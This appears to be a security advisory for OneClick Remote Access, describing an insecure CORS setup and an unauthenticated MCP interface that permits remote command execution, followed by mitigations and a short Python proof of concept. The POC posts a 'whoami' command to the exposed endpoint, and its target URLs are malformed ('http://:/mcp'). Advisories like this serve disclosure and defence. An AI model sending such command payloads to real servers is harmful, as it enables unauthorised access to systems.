**Vulnerability Overview** * **Vulnerability Name:** OneClick Remote Access: Insecure CORS & Unauthenticated MCP Interface * **Description:** This vulnerability involves insecure Cross-Origin Resource Sharing (CORS) configuration and an unauthenticated Management Control Protocol (MCP) interface in OneClick Remote Access (OCRA) software. Attackers can exploit these flaws by sending specially crafted HTTP requests to the affected server, bypassing security restrictions to execute arbitrary commands or access sensitive data without authentication. * **CVSS Score:** 9.8 (Critical) * **Publication Date:** 2024-08-27 **Affected Scope** * **Affected Software:** OneClick Remote Access (OCRA) * **Affected Versions:** All versions * **Affected Component:** Management Control Protocol (MCP) Interface * **Specific Impacts:** * **Cross-Site Request Forgery (CSRF):** Allows attackers to trick user browsers into sending malicious requests to the OCRA server. * **Unauthenticated Access:** Attackers can directly access the MCP interface without any authentication. * **Remote Code Execution (RCE):** Attackers can execute arbitrary commands via the MCP interface. * **Information Disclosure:** Attackers can obtain sensitive information such as system configurations and user data. **Remediation** * **Official Patch:** No official patch available. * **Mitigation Measures:** * **Disable MCP Interface:** If not required, disable the MCP interface. * **Configure CORS Policy:** Restrict CORS policies to allow access only from trusted domains. * **Implement Authentication:** Enforce strict authentication mechanisms for the MCP interface. * **Network Isolation:** Isolate the OCRA server within a trusted network and restrict external access. * **Monitoring and Logging:** Monitor OCRA server logs to detect anomalous activities. **POC Code** ```python import requests # 1. Exploiting Insecure CORS Configuration # Send a request to the OCRA server with an Origin header # If the server responds with Access-Control-Allow-Origin: *, a CORS vulnerability exists response = requests.get('http://:/mcp', headers={'Origin': 'http://attacker.com'}) if 'Access-Control-Allow-Origin' in response.headers and response.headers['Access-Control-Allow-Origin'] == '*': print("CORS vulnerability exists!") # 2. Exploiting Unauthenticated MCP Interface # Send a request containing a malicious command to the OCRA server # If the server executes the command and returns a response, an unauthenticated access vulnerability exists payload = {'command': 'whoami'} response = requests.post('http://:/mcp', json=payload) if response.status_code == 200: print("Unauthenticated access vulnerability exists!") print(response.text) ```